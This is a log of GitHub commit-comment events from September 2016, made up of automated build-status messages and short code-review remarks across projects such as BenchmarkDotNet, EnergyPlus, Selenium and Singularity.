{"id":"4585099179","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19083094,"position":null,"line":null,"path":null,"commit_id":"c7c5aed75ecda47eddcba3555bb9ba1ab776ee24","created_at":"2016-09-19T18:36:16Z","updated_at":"2016-09-19T18:36:16Z","body":"ASIHPValidation (mjwitte) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c7c5aed75ecda47eddcba3555bb9ba1ab776ee24-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-19T18:36:16Z"}
{"id":"4585100826","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":19083096,"position":null,"line":null,"path":null,"commit_id":"2459cb5f45611bf879a57f09ecd722ec6e298ff1","created_at":"2016-09-19T18:36:35Z","updated_at":"2016-09-19T18:36:35Z","body":"The following doc(s) have been deployed to the [slashzerop](https://slashzerop-static-docs.pantheonsite.io/docs) Multidev environment:\n- [docs/unsupported-modules-plugins](https://slashzerop-static-docs.pantheonsite.io/docs/unsupported-modules-plugins)\n"}},"created_at":"2016-09-19T18:36:35Z"}
{"id":"4585102610","type":"CommitCommentEvent","actor":{"login":"adamsitnik"},"repo":{"name":"PerfDotNet/BenchmarkDotNet"},"payload":{"comment":{"id":19083102,"position":5,"line":5,"path":"src/BenchmarkDotNet.Core/Jobs/PropertyT.cs","commit_id":"972fee7401c1d460342f5afed07b802513d47445","created_at":"2016-09-19T18:36:55Z","updated_at":"2016-09-19T18:36:55Z","body":"property died young ;)"}},"created_at":"2016-09-19T18:36:55Z"}
{"id":"4585104798","type":"CommitCommentEvent","actor":{"login":"kasalaravi"},"repo":{"name":"kasalaravi/RaviRepo"},"payload":{"comment":{"id":19083108,"position":null,"line":null,"path":null,"commit_id":"872ff6db768b71abcb2b5bb92b6ad18cd1da78d7","created_at":"2016-09-19T18:37:17Z","updated_at":"2016-09-19T18:37:17Z","body":"Hey this is my second try.\r\nHope it will success."}},"created_at":"2016-09-19T18:37:17Z"}
{"id":"4585116277","type":"CommitCommentEvent","actor":{"login":"kasalaravi"},"repo":{"name":"kasalaravi/RaviRepo"},"payload":{"comment":{"id":19083137,"position":null,"line":null,"path":null,"commit_id":"872ff6db768b71abcb2b5bb92b6ad18cd1da78d7","created_at":"2016-09-19T18:39:19Z","updated_at":"2016-09-19T18:39:19Z","body":"Hi"}},"created_at":"2016-09-19T18:39:19Z"}
{"id":"4585119755","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19083149,"position":null,"line":null,"path":null,"commit_id":"b3b8f39e286dde8bcd70539e1a1025f83c90dd6b","created_at":"2016-09-19T18:39:57Z","updated_at":"2016-09-19T18:39:57Z","body":"os_2_0_develop_linux (kbenne) - x86_64-MacOS-10.10-clang: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-b3b8f39e286dde8bcd70539e1a1025f83c90dd6b-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-b3b8f39e286dde8bcd70539e1a1025f83c90dd6b-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-19T18:39:57Z"}
{"id":"4585128747","type":"CommitCommentEvent","actor":{"login":"JoinRajuncraftNow"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":19083175,"position":null,"line":null,"path":null,"commit_id":"2833ac719fbf9e5ba9ae3c5dd0281adaee091909","created_at":"2016-09-19T18:41:32Z","updated_at":"2016-09-19T18:41:32Z","body":"Ever heard of ncurses? Its conio.h but for linux. Well, as far as I know. It might be easier/faster/smaller than what you are currently doing."}},"created_at":"2016-09-19T18:41:32Z"}
{"id":"4585129975","type":"CommitCommentEvent","actor":{"login":"vmassol"},"repo":{"name":"xwiki/xwiki-platform"},"payload":{"comment":{"id":19083178,"position":9,"line":123,"path":"xwiki-platform-core/xwiki-platform-security/xwiki-platform-security-api/src/main/java/org/xwiki/security/authorization/cache/internal/SecurityCache.java","commit_id":"53dbabc7c723cf6e9bc41d98947d6f3a7951edc0","created_at":"2016-09-19T18:41:45Z","updated_at":"2016-09-19T18:41:45Z","body":"we use @since 8.3RC1 usually. However when there are multiple since tags we don't have a clearly defined rule but I think we should standardize on having several @since tags, e.g.\r\n\r\n````\r\n@since 8.3RC1\r\n@since 7.4.5\r\n@since 7.1.5\r\n````\r\n\r\nThis would allow to more simply parse the since info. \r\n\r\nActually this is already what is expected by our UnstableAnnotationCheck, see https://github.com/xwiki/xwiki-commons/blob/43e758878c498581dcb66fa7f037bf55b2be5a34/xwiki-commons-tools/xwiki-commons-tool-verification-resources/src/main/java/org/xwiki/tool/checkstyle/UnstableAnnotationCheck.java#L137-L137"}},"created_at":"2016-09-19T18:41:45Z"}
{"id":"4585133337","type":"CommitCommentEvent","actor":{"login":"AndreyAkinshin"},"repo":{"name":"PerfDotNet/BenchmarkDotNet"},"payload":{"comment":{"id":19083190,"position":12,"line":12,"path":"docs/guide/Configs/Jobs.md","commit_id":"972fee7401c1d460342f5afed07b802513d47445","created_at":"2016-09-19T18:42:20Z","updated_at":"2016-09-19T18:42:20Z","body":"Here we have another problem: there is the [Environment](https://msdn.microsoft.com/en-us/library/system.environment%28v=vs.110%29.aspx?f=255&MSPPError=-2147217396) class, if you are trying to use this word in your code like a namespace (note that we have a namespaces BenchmarkDotNet.Environments) or a class name, you will have many troubles with resolving. Thus, if we want to use a full name here, we have to find a good synonym of environment."}},"created_at":"2016-09-19T18:42:20Z"}
{"id":"4585133975","type":"CommitCommentEvent","actor":{"login":"dhensby"},"repo":{"name":"silverstripe/silverstripe-cms"},"payload":{"comment":{"id":19083192,"position":13,"line":181,"path":"javascript/LeftAndMain_right.js","commit_id":"41aec54e88c2838a862453ad27acbbce075cc3e2","created_at":"2016-09-19T18:42:28Z","updated_at":"2016-09-19T18:42:28Z","body":"The old \"hosting company bumping PHP versions without telling anyone\" trick? Afraid I can't help with this particular issue and 2.4 is unsupported so you'd likely need to run your own fork for any fixes you need."}},"created_at":"2016-09-19T18:42:28Z"}
{"id":"4585139182","type":"CommitCommentEvent","actor":{"login":"AndreyAkinshin"},"repo":{"name":"PerfDotNet/BenchmarkDotNet"},"payload":{"comment":{"id":19083203,"position":57,"line":57,"path":"docs/guide/Configs/Jobs.md","commit_id":"972fee7401c1d460342f5afed07b802513d47445","created_at":"2016-09-19T18:43:22Z","updated_at":"2016-09-19T18:43:22Z","body":"Ok, here we can use `Infrastructure`. Is it ok? Do have other name ideas for this section?"}},"created_at":"2016-09-19T18:43:22Z"}
{"id":"4585141852","type":"CommitCommentEvent","actor":{"login":"titusfortner"},"repo":{"name":"SeleniumHQ/selenium"},"payload":{"comment":{"id":19083209,"position":4,"line":87,"path":"rb/lib/selenium/webdriver/chrome/bridge.rb","commit_id":"134cbc257d9df7d02d7cbe7d5734434187927b26","created_at":"2016-09-19T18:43:53Z","updated_at":"2016-09-19T18:43:53Z","body":"previous implementation was `'proxy'`, and I updated it to use `:proxy`, but thought I should make it backward compatible."}},"created_at":"2016-09-19T18:43:53Z"}
{"id":"4585147412","type":"CommitCommentEvent","actor":{"login":"AndreyAkinshin"},"repo":{"name":"PerfDotNet/BenchmarkDotNet"},"payload":{"comment":{"id":19083217,"position":9,"line":9,"path":"src/BenchmarkDotNet.Core/Attributes/Jobs/SimpleJobAttribute.cs","commit_id":"972fee7401c1d460342f5afed07b802513d47445","created_at":"2016-09-19T18:44:52Z","updated_at":"2016-09-19T18:44:52Z","body":"@adamsitnik, LGTM, will be changed."}},"created_at":"2016-09-19T18:44:52Z"}
{"id":"4585149566","type":"CommitCommentEvent","actor":{"login":"XFuryMCPE"},"repo":{"name":"iTXTech/Genisys"},"payload":{"comment":{"id":19083220,"position":null,"line":null,"path":null,"commit_id":"0fd04ecb725e0417e82a5f97b79bdc92af5907dd","created_at":"2016-09-19T18:45:15Z","updated_at":"2016-09-19T18:45:15Z","body":"❤️ "}},"created_at":"2016-09-19T18:45:15Z"}
{"id":"4585151611","type":"CommitCommentEvent","actor":{"login":"tpetr"},"repo":{"name":"HubSpot/Singularity"},"payload":{"comment":{"id":19083228,"position":null,"line":null,"path":null,"commit_id":"68d387e6ef55459a74e65fa3eba1e497468bc132","created_at":"2016-09-19T18:45:34Z","updated_at":"2016-09-19T18:45:34Z","body":"🚢 "}},"created_at":"2016-09-19T18:45:34Z"}
{"id":"4585152261","type":"CommitCommentEvent","actor":{"login":"tpetr"},"repo":{"name":"HubSpot/Singularity"},"payload":{"comment":{"id":19083232,"position":null,"line":null,"path":null,"commit_id":"4869e235f0d34558453972c6443a12abdab8f171","created_at":"2016-09-19T18:45:41Z","updated_at":"2016-09-19T18:45:41Z","body":"🚢 "}},"created_at":"2016-09-19T18:45:41Z"}
{"id":"4585152380","type":"CommitCommentEvent","actor":{"login":"Palmidence"},"repo":{"name":"Avicus/Rotations"},"payload":{"comment":{"id":19083233,"position":null,"line":null,"path":null,"commit_id":"f3e327a55afd4522d03c16adc6bf73c3e2de9c75","created_at":"2016-09-19T18:45:42Z","updated_at":"2016-09-19T18:45:42Z","body":"What would the module be? o-O"}},"created_at":"2016-09-19T18:45:42Z"}
{"id":"4585152847","type":"CommitCommentEvent","actor":{"login":"tpetr"},"repo":{"name":"HubSpot/Singularity"},"payload":{"comment":{"id":19083236,"position":null,"line":null,"path":null,"commit_id":"8a21a442d1d761b3416918325f5a50d855e16e6f","created_at":"2016-09-19T18:45:46Z","updated_at":"2016-09-19T18:45:46Z","body":"🚢 "}},"created_at":"2016-09-19T18:45:46Z"}
{"id":"4585153205","type":"CommitCommentEvent","actor":{"login":"AndreyAkinshin"},"repo":{"name":"PerfDotNet/BenchmarkDotNet"},"payload":{"comment":{"id":19083238,"position":12,"line":12,"path":"src/BenchmarkDotNet.Core/Characteristics/CharacteristicHelper.cs","commit_id":"972fee7401c1d460342f5afed07b802513d47445","created_at":"2016-09-19T18:45:50Z","updated_at":"2016-09-19T18:45:50Z","body":"Good idea, will be fixed."}},"created_at":"2016-09-19T18:45:50Z"}
{"id":"4585153338","type":"CommitCommentEvent","actor":{"login":"tpetr"},"repo":{"name":"HubSpot/Singularity"},"payload":{"comment":{"id":19083239,"position":null,"line":null,"path":null,"commit_id":"5ff64849de9b93e48b9acf089b8749fba703f503","created_at":"2016-09-19T18:45:51Z","updated_at":"2016-09-19T18:45:51Z","body":"🚢 "}},"created_at":"2016-09-19T18:45:51Z"}
{"id":"4585154187","type":"CommitCommentEvent","actor":{"login":"tpetr"},"repo":{"name":"HubSpot/Singularity"},"payload":{"comment":{"id":19083245,"position":null,"line":null,"path":null,"commit_id":"a4434e2dd1a13d331ba93dded5f37f3627fab24d","created_at":"2016-09-19T18:46:00Z","updated_at":"2016-09-19T18:46:00Z","body":"🚢 "}},"created_at":"2016-09-19T18:46:00Z"}
{"id":"4585154778","type":"CommitCommentEvent","actor":{"login":"rstoyanchev"},"repo":{"name":"sdeleuze/spring-framework"},"payload":{"comment":{"id":19083249,"position":79,"line":77,"path":"spring-web/src/main/java/org/springframework/http/codec/AbstractServerHttpMessageWriter.java","commit_id":"b17f596f60fac7af458e6cf5b3cfcb911d0c3744","created_at":"2016-09-19T18:46:07Z","updated_at":"2016-09-19T18:46:07Z","body":"resolveHints maybe since that's what it returns? So most sub-classes would just override this method would look similar to before."}},"created_at":"2016-09-19T18:46:07Z"}
{"id":"4585155306","type":"CommitCommentEvent","actor":{"login":"tpetr"},"repo":{"name":"HubSpot/Singularity"},"payload":{"comment":{"id":19083251,"position":null,"line":null,"path":null,"commit_id":"9087f459199960adebedc69f4706a5889b5f1725","created_at":"2016-09-19T18:46:12Z","updated_at":"2016-09-19T18:46:12Z","body":"🚢 "}},"created_at":"2016-09-19T18:46:12Z"}
{"id":"4585155491","type":"CommitCommentEvent","actor":{"login":"AndreyAkinshin"},"repo":{"name":"PerfDotNet/BenchmarkDotNet"},"payload":{"comment":{"id":19083253,"position":36,"line":36,"path":"src/BenchmarkDotNet.Core/Characteristics/CharacteristicSet.cs","commit_id":"972fee7401c1d460342f5afed07b802513d47445","created_at":"2016-09-19T18:46:13Z","updated_at":"2016-09-19T18:46:13Z","body":"Ok, will be fixed."}},"created_at":"2016-09-19T18:46:13Z"}
{"id":"4585155569","type":"CommitCommentEvent","actor":{"login":"mchiasson"},"repo":{"name":"stuthelotusguy/BSTest"},"payload":{"comment":{"id":19083254,"position":null,"line":null,"path":null,"commit_id":"283a4f57f18c13e40db7cb9a13eeb1f4cbe93e91","created_at":"2016-09-19T18:46:14Z","updated_at":"2016-09-19T18:46:14Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;XF7wqRJA&#x2F;47-roku-brightscript-client-with-local-controls\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Roku BrightScript Client with Local controls</a>"}},"created_at":"2016-09-19T18:46:14Z"}
{"id":"4585157320","type":"CommitCommentEvent","actor":{"login":"region51"},"repo":{"name":"RussianFedora/telegram-desktop"},"payload":{"comment":{"id":19083259,"position":268,"line":226,"path":"telegram-desktop.spec","commit_id":"8f48f3b415058d97961ef5e4c8eb67362601db02","created_at":"2016-09-19T18:46:33Z","updated_at":"2016-09-19T18:46:33Z","body":"зачем этот scriptlet, ведь нет %{_datadir}/mime/packages https://fedoraproject.org/wiki/Packaging:Scriptlets#mimeinfo"}},"created_at":"2016-09-19T18:46:33Z"}
{"id":"4585159847","type":"CommitCommentEvent","actor":{"login":"fscottfoti"},"repo":{"name":"MetropolitanTransportationCommission/bayarea_urbansim"},"payload":{"comment":{"id":19083261,"position":null,"line":null,"path":null,"commit_id":"f410b8ca9e534dd0fec0317d05f848e9b1a8cf11","created_at":"2016-09-19T18:47:00Z","updated_at":"2016-09-19T18:47:00Z","body":"@mkreilly Mike this should copy the base year summaries alongside the post-2010 info - I made sure it runs but didn't do a full simulation so let me know if there are any problems."}},"created_at":"2016-09-19T18:47:00Z"}
{"id":"4585160455","type":"CommitCommentEvent","actor":{"login":"AndreyAkinshin"},"repo":{"name":"PerfDotNet/BenchmarkDotNet"},"payload":{"comment":{"id":19083264,"position":107,"line":100,"path":"src/BenchmarkDotNet.Core/Code/CodeGenerator.cs","commit_id":"972fee7401c1d460342f5afed07b802513d47445","created_at":"2016-09-19T18:47:07Z","updated_at":"2016-09-19T18:47:07Z","body":"Ok."}},"created_at":"2016-09-19T18:47:07Z"}
{"id":"4585160525","type":"CommitCommentEvent","actor":{"login":"twalpole"},"repo":{"name":"SeleniumHQ/selenium"},"payload":{"comment":{"id":19083265,"position":4,"line":87,"path":"rb/lib/selenium/webdriver/chrome/bridge.rb","commit_id":"134cbc257d9df7d02d7cbe7d5734434187927b26","created_at":"2016-09-19T18:47:07Z","updated_at":"2016-09-19T18:47:07Z","body":"Ah - my mistake, missed that - sorry for the spam"}},"created_at":"2016-09-19T18:47:07Z"}
{"id":"4585161264","type":"CommitCommentEvent","actor":{"login":"thekeenant"},"repo":{"name":"Avicus/Rotations"},"payload":{"comment":{"id":19083267,"position":null,"line":null,"path":null,"commit_id":"f3e327a55afd4522d03c16adc6bf73c3e2de9c75","created_at":"2016-09-19T18:47:14Z","updated_at":"2016-09-19T18:47:14Z","body":"Last player or competitor standing objective."}},"created_at":"2016-09-19T18:47:14Z"}
{"id":"4585170729","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/balrog"},"payload":{"comment":{"id":19083281,"position":null,"line":null,"path":null,"commit_id":"38830e39e9c7d28c280b85b78ea66df6ef1bae66","created_at":"2016-09-19T18:48:52Z","updated_at":"2016-09-19T18:48:52Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#ePiCcdlpT-2hdDlNu1wWow"}},"created_at":"2016-09-19T18:48:52Z"}
{"id":"4585171020","type":"CommitCommentEvent","actor":{"login":"hughbe"},"repo":{"name":"mellinoe/corefx"},"payload":{"comment":{"id":19083283,"position":4,"line":55,"path":"src/Common/tests/System/PlatformDetection.cs","commit_id":"0e9dc1dc327dc0754458505767f2f458b1737d18","created_at":"2016-09-19T18:48:55Z","updated_at":"2016-09-19T18:48:55Z","body":"typo: IsUbuntu1604 -> IsUbuntu1610"}},"created_at":"2016-09-19T18:48:55Z"}
{"id":"4585171979","type":"CommitCommentEvent","actor":{"login":"russleyshaw"},"repo":{"name":"russleyshaw/Colisee"},"payload":{"comment":{"id":19083286,"position":null,"line":null,"path":null,"commit_id":"1f423fc00337e6fe6544d92dddaf174ffbc02274","created_at":"2016-09-19T18:49:07Z","updated_at":"2016-09-19T18:49:07Z","body":"You could have just moved it to the correct directory. After work, Ill make sure it gets in the right directory, and ill comment out any non-working tests"}},"created_at":"2016-09-19T18:49:07Z"}
{"id":"4585174573","type":"CommitCommentEvent","actor":{"login":"dkati"},"repo":{"name":"AOSP-JF-MM/platform_manifest"},"payload":{"comment":{"id":19083290,"position":null,"line":null,"path":null,"commit_id":"7d06fd62dd20655961730cfe4f1ea83adf26061c","created_at":"2016-09-19T18:49:33Z","updated_at":"2016-09-19T18:49:33Z","body":"by the way...i was looking on init_jflte.cpp file and i saw that MM rom(optcm and aosp6) has got \r\nrc = property_get(\"ro.board.platform\", platform);          (2 parametres to property_get function)\r\naosp7 has got \r\nrc = property_get(\"ro.board.platform\", platform, NULL);     (3 parametres)\r\ni believe the issue is at init/init_jflte.cpp\r\n\r\n"}},"created_at":"2016-09-19T18:49:33Z"}
{"id":"4585177861","type":"CommitCommentEvent","actor":{"login":"AndreyAkinshin"},"repo":{"name":"PerfDotNet/BenchmarkDotNet"},"payload":{"comment":{"id":19083295,"position":44,"line":57,"path":"src/BenchmarkDotNet.Core/Columns/BaselineScaledColumn.cs","commit_id":"972fee7401c1d460342f5afed07b802513d47445","created_at":"2016-09-19T18:50:08Z","updated_at":"2016-09-19T18:50:08Z","body":"Yes, see implementation of the method. It will return `null` for `Min < 1e-9` case."}},"created_at":"2016-09-19T18:50:08Z"}
{"id":"4585181495","type":"CommitCommentEvent","actor":{"login":"AndreyAkinshin"},"repo":{"name":"PerfDotNet/BenchmarkDotNet"},"payload":{"comment":{"id":19083305,"position":13,"line":13,"path":"src/BenchmarkDotNet.Core/Columns/TargetMethodColumn.cs","commit_id":"972fee7401c1d460342f5afed07b802513d47445","created_at":"2016-09-19T18:50:43Z","updated_at":"2016-09-19T18:50:43Z","body":"LGTM, will be fixed."}},"created_at":"2016-09-19T18:50:43Z"}
{"id":"4585187811","type":"CommitCommentEvent","actor":{"login":"region51"},"repo":{"name":"RussianFedora/telegram-desktop"},"payload":{"comment":{"id":19083319,"position":177,"line":157,"path":"telegram-desktop.spec","commit_id":"8f48f3b415058d97961ef5e4c8eb67362601db02","created_at":"2016-09-19T18:51:50Z","updated_at":"2016-09-19T18:51:50Z","body":"макрос %make_install, что не работает?"}},"created_at":"2016-09-19T18:51:50Z"}
{"id":"4585188779","type":"CommitCommentEvent","actor":{"login":"khurshid-alam"},"repo":{"name":"numixproject/numix-gtk-theme"},"payload":{"comment":{"id":19083321,"position":null,"line":null,"path":null,"commit_id":"a8205bada6ea32e2d2224c896979927c66eaf899","created_at":"2016-09-19T18:52:01Z","updated_at":"2016-09-19T18:52:01Z","body":"Yes, bazaar system on launchpad hasn't seen any update in past few years. It can't even understand gpg signature in git commit. Launchpad introduced native git few months back. As soon as they they let us import git source into their git branch, I will switch.\r\n\r\nAs for debian, oh well, it's still a dependency hell, and people at debian world are still waiting for terminix to compile for them!! "}},"created_at":"2016-09-19T18:52:01Z"}
{"id":"4585193642","type":"CommitCommentEvent","actor":{"login":"noisecapella"},"repo":{"name":"mitodl/micromasters"},"payload":{"comment":{"id":19083330,"position":null,"line":null,"path":null,"commit_id":"b99e0d20527782d096a50c01eb11018673213c93","created_at":"2016-09-19T18:52:53Z","updated_at":"2016-09-19T18:52:53Z","body":"Yeah, I should probably use npm install instead of editing `package.json` here"}},"created_at":"2016-09-19T18:52:53Z"}
{"id":"4585195399","type":"CommitCommentEvent","actor":{"login":"adamsitnik"},"repo":{"name":"PerfDotNet/BenchmarkDotNet"},"payload":{"comment":{"id":19083339,"position":null,"line":null,"path":null,"commit_id":"972fee7401c1d460342f5afed07b802513d47445","created_at":"2016-09-19T18:53:11Z","updated_at":"2016-09-19T18:53:11Z","body":"impressive job @AndreyAkinshin ! LGTM, modulo comments"}},"created_at":"2016-09-19T18:53:11Z"}
{"id":"4585196579","type":"CommitCommentEvent","actor":{"login":"AndreyAkinshin"},"repo":{"name":"PerfDotNet/BenchmarkDotNet"},"payload":{"comment":{"id":19083341,"position":10,"line":10,"path":"src/BenchmarkDotNet.Core/Engines/Consumer.cs","commit_id":"972fee7401c1d460342f5afed07b802513d47445","created_at":"2016-09-19T18:53:24Z","updated_at":"2016-09-19T18:53:24Z","body":"Nope, I just want to investigate how well does it works. It looks that it works fine for most cases, but I suppose that there are some troubles in nanoseconds benchmarks."}},"created_at":"2016-09-19T18:53:24Z"}
{"id":"4585197693","type":"CommitCommentEvent","actor":{"login":"jens1o"},"repo":{"name":"WoltLab/WCF"},"payload":{"comment":{"id":19083345,"position":null,"line":null,"path":null,"commit_id":"3af41bf3779e81725265a1bc78b9a6a3bd640b67","created_at":"2016-09-19T18:53:36Z","updated_at":"2016-09-19T18:53:36Z","body":"Surely? When I use use statements or explicitly include this Exception, it falls back to the php exception?"}},"created_at":"2016-09-19T18:53:36Z"}
{"id":"4585204649","type":"CommitCommentEvent","actor":{"login":"Bjvanminnen"},"repo":{"name":"code-dot-org/code-dot-org"},"payload":{"comment":{"id":19083353,"position":null,"line":null,"path":null,"commit_id":"7d6ffae0ea292e76d753cb9f5983d8f04c25912c","created_at":"2016-09-19T18:54:54Z","updated_at":"2016-09-19T18:54:54Z","body":"👍 "}},"created_at":"2016-09-19T18:54:54Z"}
{"id":"4585205771","type":"CommitCommentEvent","actor":{"login":"sebix"},"repo":{"name":"rthalley/dnspython"},"payload":{"comment":{"id":19083358,"position":null,"line":null,"path":null,"commit_id":"58e84f91047966ad36562cd19bd89c38680f3d8c","created_at":"2016-09-19T18:55:08Z","updated_at":"2016-09-19T18:55:08Z","body":"Minor note: The email address you used in your commit is not linked to your account."}},"created_at":"2016-09-19T18:55:08Z"}
{"id":"4585206425","type":"CommitCommentEvent","actor":{"login":"Pnikiema"},"repo":{"name":"Pnikiema/ISQA3420PNikiema"},"payload":{"comment":{"id":19083360,"position":null,"line":null,"path":null,"commit_id":"04f46492d64fd1640a7f883a7985a44aae2747c8","created_at":"2016-09-19T18:55:15Z","updated_at":"2016-09-19T18:55:15Z","body":"![dfd2](https://cloud.githubusercontent.com/assets/21353531/18644889/ae09161a-7e70-11e6-88b1-2b8aff036ed4.png)\r\n"}},"created_at":"2016-09-19T18:55:15Z"}
{"id":"4585211055","type":"CommitCommentEvent","actor":{"login":"AndreyAkinshin"},"repo":{"name":"PerfDotNet/BenchmarkDotNet"},"payload":{"comment":{"id":19083374,"position":66,"line":66,"path":"src/BenchmarkDotNet.Core/Engines/Engine.cs","commit_id":"972fee7401c1d460342f5afed07b802513d47445","created_at":"2016-09-19T18:56:01Z","updated_at":"2016-09-19T18:56:01Z","body":"Nope. Here we have the following logic:\r\n* Perform pilot stage\r\n* Perform warmup stage\r\n* Perform main stage\r\n* Calculate and print result set of measurements based on idle and main measurements (related to `Accuracy.EvaluateOverhead` and `Accuracy.RemoveOutliers`). I didn't finish all the calculation here, will be implemented soon."}},"created_at":"2016-09-19T18:56:01Z"}
{"id":"4585214834","type":"CommitCommentEvent","actor":{"login":"decriptor"},"repo":{"name":"mono/monodevelop"},"payload":{"comment":{"id":19083378,"position":8,"line":71,"path":"main/src/core/MonoDevelop.Ide/MonoDevelop.Components.PropertyGrid/PropertyEditorCell.cs","commit_id":"5fc80a71de7c355edb14098bf60db585bf13fad1","created_at":"2016-09-19T18:56:42Z","updated_at":"2016-09-19T18:56:42Z","body":"Why not use things like: `layout?.Dispose()`"}},"created_at":"2016-09-19T18:56:42Z"}
{"id":"4585217213","type":"CommitCommentEvent","actor":{"login":"siimon"},"repo":{"name":"siimon/prom-client"},"payload":{"comment":{"id":19083384,"position":null,"line":null,"path":null,"commit_id":"00ac89b7bb307fb6c6a539f34773fac941d269f1","created_at":"2016-09-19T18:57:09Z","updated_at":"2016-09-19T18:57:09Z","body":"@tcolgate makes sense, was maybe abit trigger happy :)\r\n\r\nPushing a fix to this in a minute"}},"created_at":"2016-09-19T18:57:09Z"}
{"id":"4585217267","type":"CommitCommentEvent","actor":{"login":"dkayiwa"},"repo":{"name":"openmrs/openmrs-core"},"payload":{"comment":{"id":19083385,"position":null,"line":null,"path":null,"commit_id":"e6fc3869109c616db5030b6fd9e277a2e39ef3b5","created_at":"2016-09-19T18:57:09Z","updated_at":"2016-09-19T18:57:09Z","body":"@rkorytkowski i back ported your followup commit at https://github.com/openmrs/openmrs-core/commit/65a9e44a151c1f68c5834e4f46586b7833c696e5\r\nAnd then tried to compile the module again. I still got the same exact error as before. And i can reproduce it 100% all the time."}},"created_at":"2016-09-19T18:57:09Z"}
{"id":"4585219393","type":"CommitCommentEvent","actor":{"login":"jonkykong"},"repo":{"name":"jonkykong/SideMenu"},"payload":{"comment":{"id":19083390,"position":null,"line":null,"path":null,"commit_id":"596c20cbbb291baeed5d64515c86960b043127f7","created_at":"2016-09-19T18:57:33Z","updated_at":"2016-09-19T18:57:33Z","body":"Yes."}},"created_at":"2016-09-19T18:57:33Z"}
{"id":"4585220965","type":"CommitCommentEvent","actor":{"login":"kdambekalns"},"repo":{"name":"mocdk/MOC.NotFound"},"payload":{"comment":{"id":19083393,"position":null,"line":null,"path":null,"commit_id":"6b7dea2944b3d49200a9903099fadfdf85973c94","created_at":"2016-09-19T18:57:51Z","updated_at":"2016-09-19T18:57:51Z","body":"If there is no page with the an `uriPathSegment` of 404 in that dimension, that will happen. Are you sure it happens always? Even if such a page exists? And if it doesn't exist, how is the expected 404 page rendered? Via a fallback?"}},"created_at":"2016-09-19T18:57:51Z"}
{"id":"4585222257","type":"CommitCommentEvent","actor":{"login":"glennreyes"},"repo":{"name":"iansinnott/react-static-webpack-plugin"},"payload":{"comment":{"id":19083396,"position":null,"line":null,"path":null,"commit_id":"0bbf365331e9130c58473fdc9e28d5f1b6314035","created_at":"2016-09-19T18:58:06Z","updated_at":"2016-09-19T18:58:06Z","body":"Thanks for that! @iansinnott \r\nCould you please publish that release to npm?"}},"created_at":"2016-09-19T18:58:06Z"}
{"id":"4585223602","type":"CommitCommentEvent","actor":{"login":"joshuaruesweg"},"repo":{"name":"WoltLab/WCF"},"payload":{"comment":{"id":19083400,"position":null,"line":null,"path":null,"commit_id":"3af41bf3779e81725265a1bc78b9a6a3bd640b67","created_at":"2016-09-19T18:58:20Z","updated_at":"2016-09-19T18:58:20Z","body":"Where is this class used? It is since `3.0` and can't used by third party plugins (because there are not yet aviable)."}},"created_at":"2016-09-19T18:58:20Z"}
{"id":"4585225986","type":"CommitCommentEvent","actor":{"login":"aldarund"},"repo":{"name":"PokemonGoMap/PokemonGo-Map"},"payload":{"comment":{"id":19083407,"position":null,"line":null,"path":null,"commit_id":"58c6bae832a30748d4913aa43fd69065ee3cb8cb","created_at":"2016-09-19T18:58:46Z","updated_at":"2016-09-19T18:58:46Z","body":"... Its bad.  And never should be here. Ths requirement already in requirements.txt. It wasnt working for you because u alrady installed it and didnt provide -u flag to pip when updating from requirements.txt"}},"created_at":"2016-09-19T18:58:46Z"}
{"id":"4585228079","type":"CommitCommentEvent","actor":{"login":"AndreyAkinshin"},"repo":{"name":"PerfDotNet/BenchmarkDotNet"},"payload":{"comment":{"id":19083416,"position":5,"line":35,"path":"src/BenchmarkDotNet.Core/Exporters/RPlotExporter.cs","commit_id":"972fee7401c1d460342f5afed07b802513d47445","created_at":"2016-09-19T18:59:10Z","updated_at":"2016-09-19T18:59:10Z","body":"In general case, you have to specify the `R_HOME` variable (and we have info about it in docs). In this line, you can see a bonus for people how are using last version of R (x64 + Windows). =) Probably, I will rewrite this logic sometimes (I want to implement smart R autodetection + nice warnings)."}},"created_at":"2016-09-19T18:59:10Z"}
{"id":"4585229225","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"tessaSAC/TEARGET"},"payload":{"comment":{"id":19083418,"position":17,"line":17,"path":"browser/js/cart/cart.js","commit_id":"d8d0cf174a58695ab782994e0ba69d4575148d13","created_at":"2016-09-19T18:59:21Z","updated_at":"2016-09-19T18:59:21Z","body":"Yeah to clarify it's fine to have `var`s — in fact in general you should put as little in `$scope` as possible."}},"created_at":"2016-09-19T18:59:21Z"}
{"id":"4585229693","type":"CommitCommentEvent","actor":{"login":"iansinnott"},"repo":{"name":"iansinnott/react-static-webpack-plugin"},"payload":{"comment":{"id":19083419,"position":null,"line":null,"path":null,"commit_id":"0bbf365331e9130c58473fdc9e28d5f1b6314035","created_at":"2016-09-19T18:59:26Z","updated_at":"2016-09-19T18:59:26Z","body":"Of course! My mistake. forgot that step"}},"created_at":"2016-09-19T18:59:26Z"}
